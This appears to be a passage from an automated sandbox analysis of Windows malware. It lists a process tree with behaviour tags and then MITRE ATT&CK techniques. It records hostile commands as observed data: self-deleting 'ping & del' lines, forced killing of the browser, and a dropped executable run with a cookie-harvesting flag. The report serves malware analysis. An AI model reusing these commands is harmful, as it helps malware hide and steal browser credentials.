"C:\Program Files\Mozilla Firefox\firefox.exe"
8⤵
- Suspicious use of SetWindowsHookEx
PID:4836

C:\Users\Admin\AppData\Roaming\1605810362353.exe
"C:\Users\Admin\AppData\Roaming\1605810362353.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810362353.txt"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5928

C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 200 installp1
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5372

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
8⤵
PID:4004

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
9⤵
- Kills process with taskkill
PID:5360

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
8⤵
PID:5972

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
9⤵
- Runs ping.exe
PID:4880

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
7⤵
PID:4824

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
8⤵
- Runs ping.exe
PID:5348

C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4948

C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4056

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
5⤵
- Executes dropped EXE
PID:6120

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
5⤵
- Executes dropped EXE
PID:6112

C:\Users\Admin\Desktop\OnlineInstaller.exe
"C:\Users\Admin\Desktop\OnlineInstaller.exe"
1⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4404

C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp
C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp -install
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4856

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3c4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4780

C:\Users\Admin\Desktop\42f972925508a82236e8533567487761.exe
"C:\Users\Admin\Desktop\42f972925508a82236e8533567487761.exe"
1⤵
- Executes dropped EXE
PID:4224

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:4284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:4492

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5408

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
PID:5456

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B1892284D68E555EFE733C0196F8E52E C
2⤵
- Loads dropped DLL
PID:4424

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5760

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5712

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Security Software Discovery

T1063

Query Registry

System Information Discovery